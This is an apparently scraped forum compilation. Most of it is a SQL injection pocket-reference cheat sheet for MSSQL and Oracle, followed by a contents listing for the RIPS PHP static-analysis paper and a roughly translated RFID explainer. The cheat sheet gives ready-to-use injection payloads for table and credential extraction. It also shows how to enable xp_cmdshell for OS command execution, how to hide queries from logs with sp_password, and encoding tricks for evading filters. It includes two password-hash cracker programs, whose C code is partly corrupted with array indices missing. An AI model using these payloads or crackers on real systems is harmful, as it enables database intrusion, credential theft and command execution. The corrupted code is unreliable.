using a bitwise rotate instead of a left shift * - causing more arithmetic overflows */ #include typedef unsigned long u32; /* Allowable characters in password; 33-126 is printable ascii */ #define MIN_CHAR 33 #define MAX_CHAR 126 /* Maximum length of password */ #define MAX_LEN 12 #define MASK 0x7fffffffL int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary) { int i, c; u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2; u32 newstate1, newstate2, newstate3; u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2]; u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3]; i = -1; sum = 7; state1_ary[0] = 1345345333L; state2_ary[0] = 0x12345671L; while (1) { while (i < stop) { i++; pass_ary = MIN_CHAR; step_ary = (state1_ary & 0x3f) + sum; xor_ary = step_ary*MIN_CHAR + (state1_ary << 8); sum += MIN_CHAR; state1_ary[i+1] = state1_ary ^ xor_ary; state2_ary[i+1] = state2_ary + ((state2_ary << 8) ^ state1_ary[i+1]); } state1 = state1_ary[i+1]; state2 = state2_ary[i+1]; step = (state1 & 0x3f) + sum; xor1 = step*MIN_CHAR + (state1 << 8); xor2 = (state2 << 8) ^ state1; for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) { newstate2 = state2 + (xor1 ^ xor2); newstate1 = state1 ^ xor1; newstate3 = (targ2 - newstate2) ^ (newstate2 << 8); div = (newstate1 & 0x3f) + sum + c; diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK; if (diff % div != 0) continue; d = diff / div; if (d < MIN_CHAR || d > MAX_CHAR) continue; div = (newstate3 & 0x3f) + sum + c + d; diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK; if (diff % div != 0) continue; e = diff / div; if (e < MIN_CHAR || e > MAX_CHAR) continue; pass_ary[i+1] = c; pass_ary[i+2] = d; pass_ary[i+3] = e; return 1; } while (i >= 0 && pass_ary >= MAX_CHAR) { sum -= MAX_CHAR; i--; } if (i < 0) break; pass_ary++; xor_ary += step_ary; sum++; state1_ary[i+1] = state1_ary ^ xor_ary; state2_ary[i+1] = state2_ary + ((state2_ary << 8) ^ state1_ary[i+1]); } return 0; } void crack(char *hash) { int i, len; u32 targ1, targ2, targ3; int pass[MAX_LEN]; if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) { printf("Invalid password hash: %s\n", hash); return; } printf("Hash: %08lx%08lx\n", targ1, targ2); targ3 = targ2 - targ1; targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); for (len = 3; len <= MAX_LEN; len++) { printf("Trying length %d\n", len); if ( crack0(len-4, targ1, targ3, pass) ) { printf("Found pass: "); for (i = 0; i < len; i++) putchar(pass); putchar('\n'); break; } } if (len > MAX_LEN) printf("Pass not found\n"); } int main(int argc, char *argv[]) { int i; if (argc <= 1) printf("usage: %s hash\n", argv[0]); for (i = 1; i < argc; i++) crack(argv); return 0; } MSSQL Default Databases * pubs * model * msdb * tempdb * northwind * information_schema (>= 2000) Comment Out Query * /* * -- Testing Version * @@VERSION * VERSION() Retrieving user names/passwords * Database.Table: o master..syslogins, master..sysprocesses * Columns: o name, loginameCurrent User: user, system_user, suser_sname(), is_srvrolemember('sysadmin') * Database Credentials: o SELECT user, password FROM master.dbo.sysxlogins Example: * SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID; -- Returns current user * SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);-- Is Admin? Database Server Hostname * @@servername * SERVERPROPERTY() Example: SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition') -- Only available >= SQL Server 2005 Listing Databases * Table: master..sysdatabases * Column: name * Function: DB_NAME(i) Example: * SELECT name FROM master..sysdatabases; * SELECT DB_NAME(5); We can retrieve the tables/columns from two different databases, information_schema.tables, information_schema.columns or from master..sysobjects, masters..syscolumns. Tables & Columns Retrieving Tables * Union: o UNION SELECT name FROM master..sysobjects WHERE xtype='U' -- * Blind: o AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A' * Error Based: o AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables) o AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) Note: Xtype = 'U' is for User-defined tables. You can use 'V' for views. Retrieving Columns * Union: o UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename') * Blind: o AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A' * Error Based: o AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns) o AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)) Retrieving Multiple Tables/Columns at once The following 3 queries will create a temporary table/column and insert all the user-defined tables into it, it will then dump the table content and finish by deleting the table. * Create Temp Table/Column and Insert Data: o AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END; * Dump Content: o AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB); * Delete Table: o AND 1=0; DROP TABLE TMP_DB; Note: You can encode your query in hex to "obfuscate" your attack. ' and 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--sp_password OPENROWSET Attacks SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"') System Command Execution Include an extended stored procedure named xp_cmdshell that can be used to execute operating system commands. EXEC master.dbo.xp_cmdshell 'cmd' Prior to MSSQL 2005, xp_cmdshell is disabled by default, but can easily be activated with the following queries: EXEC sp_configure 'show advanced options', 1 EXEC sp_configure reconfigure EXEC sp_configure 'xp_cmdshell', 1 EXEC sp_configure reconfigure Alternatively, you can create your own procedure to achieve the same results DECLARE @execmd INT EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT EXECSP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c' If the SQL version is higher than 2000, you will have to run additional queries in order the execute the previous command. EXEC sp_configure 'show advanced options', 1 EXEC sp_configure reconfigure EXEC sp_configure 'OLE Automation Procedures', 1 EXEC sp_configure reconfigure SP_PASSWORD (Hiding Query) Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure. Example: ' and 1=1--sp_password -- 'sp_password' was found in the text of this event. -- The text has been replaced with this comment for security reasons. Fuzzing and Obfuscation Encodings * Hex o ' and 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--sp_password * Unicode o %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0031%u0020%u0046%u0052%u004f%u004d%u0020%u0064%u0075%u0061%u006c * URL Encoded o %53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%64%75%61%6c * HTML Entities o AND SELECT 1 .ROM dual = 1 ( has to be URL Encoded) o %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2383%3B%26%2369%3B%26%2376%3B%26%2369%3B%26%2367%3B%26%2384%3B%26%2332%3B%26%2349%3B%26%2332%3B%26%2346%3B%26%2382%3B%26%2379%3B%26%2377%3B%26%2332%3B%26%23100%3B%26%23117%3B%26%2397%3B%26%23108%3B%26%2332%3B%26%2361%3B%26%2332%3B%26%2349%3B MSSQL Password Hashing Passwords begin with 0x0100, the first for bytes following the 0x are a constant; the next eight bytes are the hash salt and the remaining 80 bytes are two hashes, the first 40 bytes are a case-sensitive hash of the password, while the second 40 bytes are the uppercased version. Example: 0x0100236A261CE12AB57BA22A7F44CE3B780E52098378B65852892EEE9 ... 1C0784B911D76BF4EB124550ACABDFD1457 MSSQL Password Cracker ///////////////////////////////////////////////////////////////////////////////// // // SQLCrackCl // // This will perform a dictionary attack against the // upper-cased hash for a password. Once this // has been discovered try all case variant to work // out the case sensitive password. // // This code was written by David Litchfield to // demonstrate how Microsoft SQL Server 2000 // passwords can be attacked. This can be // optimized considerably by not using the CryptoAPI. // // (Compile with VC++ and link with advapi32.lib // Ensure the Platform SDK has been installed, too!) // ////////////////////////////////////////////////////////////////////////////////// #include #include #include FILE *fd=NULL; char *lerr = "\nLength Error!\n"; int wd=0; int OpenPasswordFile(char *pwdfile); int CrackPassword(char *hash); int main(int argc, char *argv[]) { int err = 0; if(argc !=3) { printf("\n\n*** SQLCrack *** \n\n"); printf("C:\\>%s hash passwd-file\n\n",argv[0]); printf("David Litchfield (david@ngssoftware.com)\n"); printf("24th June 2002\n"); return 0; } err = OpenPasswordFile(argv[2]); if(err !=0) { return printf("\nThere was an error opening the password file %s\n",argv[2]); } err = CrackPassword(argv[1]); fclose(fd); printf("\n\n%d",wd); return 0; } int OpenPasswordFile(char *pwdfile) { fd = fopen(pwdfile,"r"); if(fd) return 0; else return 1; } int CrackPassword(char *hash) { char phash[100]=""; char pheader[8]=""; char pkey[12]=""; char pnorm[44]=""; char pucase[44]=""; char pucfirst[8]=""; char wttf[44]=""; char uwttf[100]=""; char *wp=NULL; char *ptr=NULL; int cnt = 0; int count = 0; unsigned int key=0; unsigned int t=0; unsigned int address = 0; unsigned char cmp=0; unsigned char x=0; HCRYPTPROV hProv=0; HCRYPTHASH hHash; DWORD hl=100; unsigned char szhash[100]=""; int len=0; if(strlen(hash) !=94) { return printf("\nThe password hash is too short!\n"); } if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X')) { hash = hash + 2; strncpy(pheader,hash,4); printf("\nHeader\t\t: %s",pheader); if(strlen(pheader)!=4) return printf("%s",lerr); hash = hash + 4; strncpy(pkey,hash,8); printf("\nRand key\t: %s",pkey); if(strlen(pkey)!=8) return printf("%s",lerr); hash = hash + 8; strncpy(pnorm,hash,40); printf("\nNormal\t\t: %s",pnorm); if(strlen(pnorm)!=40) return printf("%s",lerr); hash = hash + 40; strncpy(pucase,hash,40); printf("\nUpper Case\t: %s",pucase); if(strlen(pucase)!=40) return printf("%s",lerr); strncpy(pucfirst,pucase,2); sscanf(pucfirst,"%x",&cmp); } else { return printf("The password hash has an invalid format!\n"); } printf("\n\n Trying...\n"); if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0)) { if(GetLastError()==NTE_BAD_KEYSET) { // KeySet does not exist. So create a new keyset if(!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_NEWKEYSET )) { printf("FAILLLLLLL!!!"); return FALSE; } } } while(1) { // get a word to try from the file ZeroMemory(wttf,44); if(!fgets(wttf,40,fd)) return printf("\nEnd of password file. Didn't find the password.\n"); wd++; len = strlen(wttf); wttf[len-1]=0x00; ZeroMemory(uwttf,84); // Convert the word to UNICODE while(count < len) { uwttf[cnt]=wttf[count]; cnt++; uwttf[cnt]=0x00; count++; cnt++; } len --; wp = &uwttf; sscanf(pkey,"%x",&key); cnt = cnt - 2; // Append the random stuff to the end of // the uppercase unicode password t = key >> 24; x = (unsigned char) t; uwttf[cnt]=x; cnt++; t = key << 8; t = t >> 24; x = (unsigned char) t; uwttf[cnt]=x; cnt++; t = key << 16; t = t >> 24; x = (unsigned char) t; uwttf[cnt]=x; cnt++; t = key << 24; t = t >> 24; x = (unsigned char) t; uwttf[cnt]=x; cnt++; // Create the hash if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash)) { printf("Error %x during CryptCreatHash!\n", GetLastError()); return 0; } if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0)) { printf("Error %x during CryptHashData!\n", GetLastError()); return FALSE; } CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0); // Test the first byte only. Much quicker. if(szhash[0] == cmp) { // If first byte matches try the rest ptr = pucase; cnt = 1; while(cnt < 20) { ptr = ptr + 2; strncpy(pucfirst,ptr,2); sscanf(pucfirst,"%x",&cmp); if(szhash[cnt]==cmp) cnt ++; else { break; } } if(cnt == 20) { // We've found the password printf("\nA MATCH!!! Password is %s\n",wttf); return 0; } } count = 0; cnt=0; } return 0; } ORACLE Default Databases * SYSTEM * SYSAUX Comment Out Query * -- Testing Version * SELECT banner FROM v$version WHERE banner LIKE 'Oracle%' * SELECT banner FROM v$version WHERE banner LIKE 'TNS%' * SELECT version FROM v$instance Retrieving Users/Passwords * SELECT username FROM all_users * SELECT name, password from sys.user$ (Privileges required, <= 10g) * SELECT name, spare4 from sys.user$ (Privileges required, 11g) Retrieving Databases Current Database * SELECT name FROM v$database; * SELECT instance_name FROM v$instance * SELECT global_name FROM global_name * SELECT SYS.DATABASE_NAME FROM DUAL User Databases Tables & Columns Retrieving Tables * SELECT table_name FROM all_tables Retrieving Columns * SELECT column_name FROM all_tab_columns Finding Tables from Column Name * SELECT column_name FROM all_tab_columns WHERE table_name = 'Users' Finding Column From Table Name * SELECT table_name FROM all_tab_tables WHERE column_name = 'password' Fuzzing and Obfuscation Avoiding the use of single/double quotations Unlike other RDBMS, Oracle allows us to reference table/column names encoded. * SELECT chr(32)||chr(92)||chr(93) FROM dual * SELECT 0x09120911091 1. Out Of Band Channeling Time Delay Heavy Query Time delays Sursa: Insecurity: SQL Injection Pocket Reference 2010 Cheat Sheet [sqlI]

RIPS - A static source code analyser for vulnerabilities in PHP scripts Johannes Dahse Seminar Work at Chair for Network and Data Security Prof. Dr. Jörg Schwenk advised through Dominik Birk 23.08.2010 Contents 1 Introduction 1 2 Motivation 2 3 Web application security 3 3.1 Cross-Site Scripting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 3.2 SQL Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 3.3 Other vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 4 Static source code analysis 7 4.1 Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 4.2 Model construction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 4.3 Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.3.1 Taint analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.3.2 Intraprocedural and interprocedural analysis . . . . . . . . . . . . . . . 9 4.4 Results processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 5 RIPS implementation 11 5.1 Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 5.2 Model construction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 5.2.1 Lexical and semantic analysis . . . . . . . . . . . . . . . . . . . . . . 12 5.2.2 Parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 5.2.3 Control flow analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 5.3 Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 5.3.1 Taint analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 5.3.2 Intraprocedural and interprocedural analysis . . . . . . . . . . . . . . . 16 5.4 Web interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 5.5 Scan results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 5.6 Limitations and future work . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 6 Related work 22 7 Summary 24 Download: http://garr.dl.sourceforge.net/project/rips-scanner/rips-paper.pdf Sursa: Papers

[h=5]RFID (Radio Frequency Identification)[/h] Article by: OrbitalJL What is RFID? RFID (Radio Frequency Identification) is a technique for reading information on the distance of the transponders and the memories that are called tags. The cheapest and simplest variants have a very simple structure and consists only of a unique number which they can send out a few inches. This is the most common variety used today. In this type of RFID transponder has all the information stored in a database. Post where information is stored is linked to the unique ID number. This simple type corresponds in fact usual barcodes. The next price tags are a bit more advanced and has an internal memory able to write to several times, but the memory is quite limited. The reader consists of an oscillating magnetic field that induces a sufficient voltage in the antenna of the tag should be able to send their content. The tag can be small enough to fit into a standard price tag, be deployed under the skin of an animal or surgery in humans for identification using radio waves. How does it work? Passive tags, RFID The passive tags have no internal power supply. The tag may be enough power from the reader to send a response. This thanks to the reader antenna by induction creates a sufficient voltage in the tag. The antenna of the passive tags are designed to receive the incoming signal and also send an output signal. The answer from a passive tag is not always just a idnummer but can be more complex, such as information from an integrated memory. Passive tags have the capacity to be read from 11cm up to 10 meters depending on which standard you use, and also on how the environment looks like. Thanks to the passive tags have no built-in power supply can be made very small and they are therefore very easy to place where space is limited, for example. the stickers or skin. Active tags, ARFID Unlike passive tags are active tags, a separate power source that is used to send information and enforce its components. Communications from active tags to readers is much more reliable than communications from the passive tags. This thanks to active tags can create an active session with the reader. Active tags can also send the higher stress levels, thanks to their built-in power source, which facilitates the placement of such a man, because then the signal will pass through inhibiting materials such as liquids. The disadvantage is rather that they are much larger and more expensive to manufacture. Their range can extend up to several hundred meters and batteries are sitting in the can hold up to 10 years. It can also integrate more memory because the size is not as important. Semi-Passive RFID Is a mixture of passive and active tags where the big difference is that the integrated power source only operates micro-chip but not the actual transmission of signals. Advantages of this technique is that it is much more energy efficient and can, for example Login temperatures over a period and then present data on request from a reader. The new CRFID CRFIDs is too new to have ventured far from the lab yet. But it Juels says makes it possible to encrypt and decrypt data which could make chips in passports and credit cards more secure. More on the University who are engaged in the development of CRFID can be found here: http://www.cs.umass.edu/~ssclark/crfid/papers/salajegheh-usenixsec09.pdf VeriChip With the emergence of micro-technology, some individuals have grown to fear of disqualification on grounds of RFID human implantation. VeriChip is working with an RFID implant, which will have GPS tracking capabilities. This technique can not only track a single person, but every physical object that is, geographically located in each location and all times. Although this technique could provide assistance in locating missing children or the like, it also means the government to monitor everyone and everything that has RFID chip. Moreover Theoretically, this could be done without the knowledge or consent of the individual. How can it look like? In practice, then? What can RFID be used for? If you understand the above, so you probably also understand the security risks of RFID. RFID can be used in many, many, and again in many areas. But what is perhaps the absolute worst thing is that people can easily become "infected" by RFID chips. They have even begun to advertise in the U.S. to bring these "tags" on children and animals in order to track all their movements and what they do. But RFID tags developed daily, and who knows what the future looks like. Right now you can at least use these tags to save vital information such as bank details, personal information, disease records, and much more In what areas are used RFID technology? RFID technology is of course of course its advantages, too. As that example to catch thieves in shops trying to take on products that are tagged. But RFID technology offers great opportunities hospitals, where they can put a chip in a patient in order to check important information about their patients. Allowing doctors to treat their patients in a way from home. But all this is of course a disadvantage, too, that evil people for example, could take over the patient's chip, read journals and at worst might kill people, such as using Peacemaker as doctors steering away from home, even though I do not think that progress has been easy so far yet. How is it developing? Today's RFID tags can only send fixed data back to a reader device, whether it's information on your passport or of an endangered bird. The researchers are now working to import something very interesting to the tags in the form of microcomputers, which opens the way for much smarter applications. Since RFID tags FREQUENCY shortage of batteries and cleans out all forces from broadcasting from its readers, makes limited power supply to the micro-computers a challenge. But it also has the advantage of being able to create the so-called computational RFID tags - CRFIDs - cheap, robust and long life. What does all this then? All this means a lot of fun opportunities. In all cases for me to find that extremely interesting. The advantage now is that RFID chips are very uncertain and do not even use any type of encryption to protect information found on the chip. Here are some interesting youtube clips about the technology. Extra worth checking out is a myth buster when speaking at a conference on what happened when they thought of sending a section on how hackable these RFID chips are. Myth Buster clip: Why the Mythbusters won't do RFID (last hope Adam Savage) Video on how to hack RFID is obvious: Major Malfunction've been working with RFID and gave a presentation on it at Defcon : Defcon 15 - T302 Aliens Cloned My Sheep References: There has been an error - New Scientist sv.wikipedia.org / wiki / RFID en.wikipedia.org / wiki / Radio frequency_identification The SpyChips Threat by Katherine Albrecht & Liz McIntyre Youtube.com By OrbitalJL Sursa: RFID (Radio Frequency Identification)